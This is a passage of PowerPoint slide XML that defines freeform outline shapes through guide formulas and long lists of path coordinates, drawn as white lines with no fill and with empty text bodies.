                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2868" y="2227"/>
                <a:ext cx="26" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 11 w 26"/>
                  <a:gd name="T1" fmla="*/ 45 h 45"/>
                  <a:gd name="T2" fmla="*/ 9 w 26"/>
                  <a:gd name="T3" fmla="*/ 45 h 45"/>
                  <a:gd name="T4" fmla="*/ 7 w 26"/>
                  <a:gd name="T5" fmla="*/ 43 h 45"/>
                  <a:gd name="T6" fmla="*/ 5 w 26"/>
                  <a:gd name="T7" fmla="*/ 40 h 45"/>
                  <a:gd name="T8" fmla="*/ 4 w 26"/>
                  <a:gd name="T9" fmla="*/ 39 h 45"/>
                  <a:gd name="T10" fmla="*/ 5 w 26"/>
                  <a:gd name="T11" fmla="*/ 32 h 45"/>
                  <a:gd name="T12" fmla="*/ 6 w 26"/>
                  <a:gd name="T13" fmla="*/ 25 h 45"/>
                  <a:gd name="T14" fmla="*/ 6 w 26"/>
                  <a:gd name="T15" fmla="*/ 20 h 45"/>
                  <a:gd name="T16" fmla="*/ 5 w 26"/>
                  <a:gd name="T17" fmla="*/ 15 h 45"/>
                  <a:gd name="T18" fmla="*/ 1 w 26"/>
                  <a:gd name="T19" fmla="*/ 11 h 45"/>
                  <a:gd name="T20" fmla="*/ 0 w 26"/>
                  <a:gd name="T21" fmla="*/ 8 h 45"/>
                  <a:gd name="T22" fmla="*/ 2 w 26"/>
                  <a:gd name="T23" fmla="*/ 6 h 45"/>
                  <a:gd name="T24" fmla="*/ 4 w 26"/>
                  <a:gd name="T25" fmla="*/ 6 h 45"/>
                  <a:gd name="T26" fmla="*/ 10 w 26"/>
                  <a:gd name="T27" fmla="*/ 6 h 45"/>
                  <a:gd name="T28" fmla="*/ 12 w 26"/>
                  <a:gd name="T29" fmla="*/ 5 h 45"/>
                  <a:gd name="T30" fmla="*/ 19 w 26"/>
                  <a:gd name="T31" fmla="*/ 0 h 45"/>
                  <a:gd name="T32" fmla="*/ 23 w 26"/>
                  <a:gd name="T33" fmla="*/ 5 h 45"/>
                  <a:gd name="T34" fmla="*/ 26 w 26"/>
                  <a:gd name="T35" fmla="*/ 13 h 45"/>
                  <a:gd name="T36" fmla="*/ 26 w 26"/>
                  <a:gd name="T37" fmla="*/ 15 h 45"/>
                  <a:gd name="T38" fmla="*/ 25 w 26"/>
                  <a:gd name="T39" fmla="*/ 18 h 45"/>
                  <a:gd name="T40" fmla="*/ 24 w 26"/>
                  <a:gd name="T41" fmla="*/ 22 h 45"/>
                  <a:gd name="T42" fmla="*/ 25 w 26"/>
                  <a:gd name="T43" fmla="*/ 31 h 45"/>
                  <a:gd name="T44" fmla="*/ 24 w 26"/>
                  <a:gd name="T45" fmla="*/ 35 h 45"/>
                  <a:gd name="T46" fmla="*/ 21 w 26"/>
                  <a:gd name="T47" fmla="*/ 42 h 45"/>
                  <a:gd name="T48" fmla="*/ 18 w 26"/>
                  <a:gd name="T49" fmla="*/ 40 h 45"/>
                  <a:gd name="T50" fmla="*/ 15 w 26"/>
                  <a:gd name="T51" fmla="*/ 40 h 45"/>
                  <a:gd name="T52" fmla="*/ 14 w 26"/>
                  <a:gd name="T53" fmla="*/ 41 h 45"/>
                  <a:gd name="T54" fmla="*/ 13 w 26"/>
                  <a:gd name="T55" fmla="*/ 44 h 45"/>
                  <a:gd name="T56" fmla="*/ 11 w 26"/>
                  <a:gd name="T57" fmla="*/ 45 h 45"/>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26"/>
                  <a:gd name="T88" fmla="*/ 0 h 45"/>
                  <a:gd name="T89" fmla="*/ 26 w 26"/>
                  <a:gd name="T90" fmla="*/ 45 h 45"/>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26" h="45">
                    <a:moveTo>
                      <a:pt x="11" y="45"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="45"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36098" name="Freeform 231"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2842" y="2096"/>
                <a:ext cx="191" cy="198"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 110 w 191"/>
                  <a:gd name="T1" fmla="*/ 33 h 198"/>
                  <a:gd name="T2" fmla="*/ 102 w 191"/>
                  <a:gd name="T3" fmla="*/ 35 h 198"/>
                  <a:gd name="T4" fmla="*/ 92 w 191"/>
                  <a:gd name="T5" fmla="*/ 41 h 198"/>
                  <a:gd name="T6" fmla="*/ 93 w 191"/>
                  <a:gd name="T7" fmla="*/ 47 h 198"/>
                  <a:gd name="T8" fmla="*/ 92 w 191"/>
                  <a:gd name="T9" fmla="*/ 55 h 198"/>
                  <a:gd name="T10" fmla="*/ 113 w 191"/>
                  <a:gd name="T11" fmla="*/ 80 h 198"/>
                  <a:gd name="T12" fmla="*/ 121 w 191"/>
                  <a:gd name="T13" fmla="*/ 100 h 198"/>
                  <a:gd name="T14" fmla="*/ 131 w 191"/>
                  <a:gd name="T15" fmla="*/ 112 h 198"/>
                  <a:gd name="T16" fmla="*/ 154 w 191"/>
                  <a:gd name="T17" fmla="*/ 117 h 198"/>
                  <a:gd name="T18" fmla="*/ 151 w 191"/>
                  <a:gd name="T19" fmla="*/ 126 h 198"/>
                  <a:gd name="T20" fmla="*/ 183 w 191"/>
                  <a:gd name="T21" fmla="*/ 143 h 198"/>
                  <a:gd name="T22" fmla="*/ 189 w 191"/>
                  <a:gd name="T23" fmla="*/ 157 h 198"/>
                  <a:gd name="T24" fmla="*/ 182 w 191"/>
                  <a:gd name="T25" fmla="*/ 152 h 198"/>
                  <a:gd name="T26" fmla="*/ 170 w 191"/>
                  <a:gd name="T27" fmla="*/ 147 h 198"/>
                  <a:gd name="T28" fmla="*/ 164 w 191"/>
                  <a:gd name="T29" fmla="*/ 148 h 198"/>
                  <a:gd name="T30" fmla="*/ 159 w 191"/>
                  <a:gd name="T31" fmla="*/ 159 h 198"/>
                  <a:gd name="T32" fmla="*/ 168 w 191"/>
                  <a:gd name="T33" fmla="*/ 170 h 198"/>
                  <a:gd name="T34" fmla="*/ 164 w 191"/>
                  <a:gd name="T35" fmla="*/ 177 h 198"/>
                  <a:gd name="T36" fmla="*/ 156 w 191"/>
                  <a:gd name="T37" fmla="*/ 190 h 198"/>
                  <a:gd name="T38" fmla="*/ 145 w 191"/>
                  <a:gd name="T39" fmla="*/ 196 h 198"/>
                  <a:gd name="T40" fmla="*/ 148 w 191"/>
                  <a:gd name="T41" fmla="*/ 183 h 198"/>
                  <a:gd name="T42" fmla="*/ 154 w 191"/>
                  <a:gd name="T43" fmla="*/ 177 h 198"/>
                  <a:gd name="T44" fmla="*/ 147 w 191"/>
                  <a:gd name="T45" fmla="*/ 157 h 198"/>
                  <a:gd name="T46" fmla="*/ 136 w 191"/>
                  <a:gd name="T47" fmla="*/ 151 h 198"/>
                  <a:gd name="T48" fmla="*/ 131 w 191"/>
                  <a:gd name="T49" fmla="*/ 141 h 198"/>
                  <a:gd name="T50" fmla="*/ 125 w 191"/>
                  <a:gd name="T51" fmla="*/ 138 h 198"/>
                  <a:gd name="T52" fmla="*/ 117 w 191"/>
                  <a:gd name="T53" fmla="*/ 133 h 198"/>
                  <a:gd name="T54" fmla="*/ 103 w 191"/>
                  <a:gd name="T55" fmla="*/ 127 h 198"/>
                  <a:gd name="T56" fmla="*/ 80 w 191"/>
                  <a:gd name="T57" fmla="*/ 105 h 198"/>
                  <a:gd name="T58" fmla="*/ 60 w 191"/>
                  <a:gd name="T59" fmla="*/ 76 h 198"/>
                  <a:gd name="T60" fmla="*/ 42 w 191"/>
                  <a:gd name="T61" fmla="*/ 62 h 198"/>
                  <a:gd name="T62" fmla="*/ 24 w 191"/>
                  <a:gd name="T63" fmla="*/ 71 h 198"/>
                  <a:gd name="T64" fmla="*/ 17 w 191"/>
                  <a:gd name="T65" fmla="*/ 65 h 198"/>
                  <a:gd name="T66" fmla="*/ 7 w 191"/>
                  <a:gd name="T67" fmla="*/ 54 h 198"/>
                  <a:gd name="T68" fmla="*/ 0 w 191"/>
                  <a:gd name="T69" fmla="*/ 45 h 198"/>
                  <a:gd name="T70" fmla="*/ 10 w 191"/>
                  <a:gd name="T71" fmla="*/ 38 h 198"/>
                  <a:gd name="T72" fmla="*/ 7 w 191"/>
                  <a:gd name="T73" fmla="*/ 27 h 198"/>
                  <a:gd name="T74" fmla="*/ 23 w 191"/>
                  <a:gd name="T75" fmla="*/ 25 h 198"/>
                  <a:gd name="T76" fmla="*/ 30 w 191"/>
                  <a:gd name="T77" fmla="*/ 19 h 198"/>
                  <a:gd name="T78" fmla="*/ 38 w 191"/>
                  <a:gd name="T79" fmla="*/ 28 h 198"/>
                  <a:gd name="T80" fmla="*/ 43 w 191"/>
                  <a:gd name="T81" fmla="*/ 14 h 198"/>
                  <a:gd name="T82" fmla="*/ 50 w 191"/>
                  <a:gd name="T83" fmla="*/ 18 h 198"/>
                  <a:gd name="T84" fmla="*/ 57 w 191"/>
                  <a:gd name="T85" fmla="*/ 15 h 198"/>
                  <a:gd name="T86" fmla="*/ 59 w 191"/>
                  <a:gd name="T87" fmla="*/ 12 h 198"/>
                  <a:gd name="T88" fmla="*/ 62 w 191"/>
                  <a:gd name="T89" fmla="*/ 5 h 198"/>
                  <a:gd name="T90" fmla="*/ 76 w 191"/>
                  <a:gd name="T91" fmla="*/ 2 h 198"/>
                  <a:gd name="T92" fmla="*/ 89 w 191"/>
                  <a:gd name="T93" fmla="*/ 0 h 198"/>
                  <a:gd name="T94" fmla="*/ 103 w 191"/>
                  <a:gd name="T95" fmla="*/ 11 h 198"/>
                  <a:gd name="T96" fmla="*/ 109 w 191"/>
                  <a:gd name="T97" fmla="*/ 19 h 198"/>
                  <a:gd name="T98" fmla="*/ 110 w 191"/>
                  <a:gd name="T99" fmla="*/ 25 h 198"/>
                  <a:gd name="T100" fmla="*/ 116 w 191"/>
                  <a:gd name="T101" fmla="*/ 33 h 198"/>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191"/>
                  <a:gd name="T154" fmla="*/ 0 h 198"/>
                  <a:gd name="T155" fmla="*/ 191 w 191"/>
                  <a:gd name="T156" fmla="*/ 198 h 198"/>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191" h="198">
                    <a:moveTo>
                      <a:pt x="116" y="35"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="114" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="35"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
